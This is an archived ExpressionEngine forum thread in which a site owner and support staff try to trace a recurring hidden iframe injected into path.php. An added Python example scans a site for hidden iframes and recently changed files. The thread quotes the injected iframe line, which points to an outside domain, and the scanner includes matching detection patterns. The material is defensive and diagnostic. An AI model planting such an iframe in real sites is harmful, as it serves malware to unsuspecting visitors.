ExpressionEngine CMS

This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.

iframe inserted into site source

March 09, 2010 6:47am

  • #1 / Mar 09, 2010 6:47am

    cultivate

    37 posts

    A site I've built seems to have been hacked, and an iframe is being inserted into the top of the code.
    After a search of the forum, I checked the path.php file and found the following code:

    echo "<iframe src=\"http://svjazka.com/vlov/index.php\" width=0 height=0 style=\"visibility:hidden;position:absolute\"></iframe>";

    I removed it yesterday and changed my FTP password.
    I've checked this morning and the same code is back.

    I have contacted the host, who haven't come back to me yet.
    I'd appreciate any help with this.

  • #2 / Mar 09, 2010 6:55am

    silenz

    1651 posts

    Your host should be able to give you information on how the files are modified.

    • If it’s a security issue on the server itself and another user can manipulate your files it’s out of your control to prevent access.
    • The hackers may as well have planted a backdoor (usually some PHP shell) in your account that gives them access through HTTP so you should check for any other files that were created or modified around the date of the attack.
    • Your computer may be affected by a virus/trojan/rootkit or whatever and the attacker repeatedly gets your FTP password.

    More advice from EE tech support will follow soon, I’m sure.

  • #3 / Mar 09, 2010 7:58am

    Sue Crocker

    26054 posts

    Thanks for the assist, silenz.

    cultivate:

      Thanks for reporting this. We take security very seriously and will do our best to work with you on figuring out what’s going on. To that end, we need some additional information from you…

      1. EE version and build (found at the bottom of your control panel)
      2. Other scripts on your account, whether in use or not (phpBB, etc…)*

      * If this is a shared hosting environment, the host can make a determination if the attack came through scripts on another account on the server, which is commonly the case with these types of hacks.

      While we work through this, please check through these files:

      * path.php
      * config.php
      * index.php

      to ensure that there is no unusual code such as iframes or JavaScript includes; if you do find that code, then please back up the file and remove said code. If you are unsure of what does or doesn’t belong in these files, do not hesitate to ask.

      You may also wish to refresh your files by following the build update instructions.

      Also please ensure that you report this to your host immediately as they can help identify where the attack originated from so that steps can be taken to prevent this in the future.
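
The two checks suggested in posts #2 and #3 (look for files changed around the time of the attack, and look for unexpected iframes or script includes) can be run over the whole site directory in one pass. This is an added example, not part of the original thread and not ExpressionEngine code; the patterns, the file-extension list, the 7-day window and the sample tree in `demo()` are all assumptions constructed for illustration.

```python
import os
import re
import tempfile
import time

# Heuristics for the injection shown in post #1: an iframe sized to zero or
# hidden with CSS, plus script includes that load from another host.
SUSPICIOUS = [
    ("hidden-iframe", re.compile(
        r"<iframe\b[^>]*(?:(?:width|height)\s*=\s*\\?[\"']?0(?![\d.])"
        r"|visibility\s*:\s*hidden|display\s*:\s*none)", re.I)),
    ("remote-script", re.compile(
        r"<script\b[^>]*\bsrc\s*=\s*\\?[\"']?(?:https?:)?//", re.I)),
]
WEB_EXTS = (".php", ".html", ".htm", ".js", ".tpl")  # assumed list

def scan_tree(root, since_epoch):
    """Return (findings, recent): pattern hits in web files, and every file
    whose mtime is at or after since_epoch (paths relative to root)."""
    findings, recent = [], []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if os.path.getmtime(path) >= since_epoch:
                recent.append(rel)
            if not name.lower().endswith(WEB_EXTS):
                continue
            with open(path, "r", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    findings += [(rel, lineno, label)
                                 for label, rx in SUSPICIOUS if rx.search(line)]
    return sorted(findings), sorted(recent)

def demo():
    """Scan a constructed site tree (sample data, not from the thread)."""
    now = time.time()
    samples = {  # relative path -> (contents, age in days)
        "path.php": ('<?php\necho "<iframe src=\\"http://injected.example.invalid/x\\"'
                     ' width=0 height=0 style=\\"visibility:hidden\\"></iframe>";\n', 0),
        "config.php": ("<?php\n$conf = array();\n", 90),
        "images/uploads/thumb.php": ("<?php // unexpected new file\n", 1),
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, (body, age_days) in samples.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(body)
            os.utime(path, (now, now - age_days * 86400))
        return scan_tree(root, since_epoch=now - 7 * 86400)

if __name__ == "__main__":
    print(demo())
```

Modification times can be reset by whoever wrote the file, so treat the recent-files list as a lead rather than proof, and compare anything it flags against a clean copy of the release.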

  • #4 / Mar 09, 2010 8:14am

    cultivate

    37 posts

    Thanks for the replies.

    @sue
    EE Version is 1.6.8 Build: 20090723
    I don't know of any scripts running on the account other than those that are used to run ExpressionEngine.

    There doesn’t seem to be anything in the config.php or index.php files, but there was the code I posted above in the path.php file, which I have removed.

    I have contacted my hosting about this, but haven’t had a reply yet.

  • #5 / Mar 09, 2010 11:37am

    Sue Crocker

    26054 posts

    Let us know what you find out. You could also take this time to upgrade to the most recent EE1.6.8 build.

  • #6 / Mar 09, 2010 5:47pm

    cultivate

    37 posts

    I've finally had a reply from my host (DreamHost).
    They have found that 4 user accounts have been accessed from more than 1 IP address, indicating a password intrusion.
    I have followed their steps: changing user passwords, switching from FTP to SFTP, removing unused user accounts, updating web software.

    The iframe had been added again since this morning, this time in 2 places. I've removed them both again, and will recheck in the morning to see if the steps I've taken have solved the issue.

  • #7 / Mar 09, 2010 7:27pm

    Brandon Jones

    5500 posts

    Please keep us posted, and do make sure that all users with control panel access have their passwords changed just to be safe.

  • #8 / Mar 24, 2010 7:46am

    cultivate

    37 posts

    It seems whatever avenue the hacker is using is still open, as the site, along with a second one, has an iframe inserted again.
    This only seems to be affecting ExpressionEngine sites on the DreamHost server. I also host WordPress sites on the same server which seem to be uninfected.

    Any help appreciated.

  • #9 / Mar 24, 2010 9:26am

    Sue Crocker

    26054 posts

    I’d change hosting companies. Personally, I recommend EngineHosting. But there are a number of quality hosts out there that will work just fine.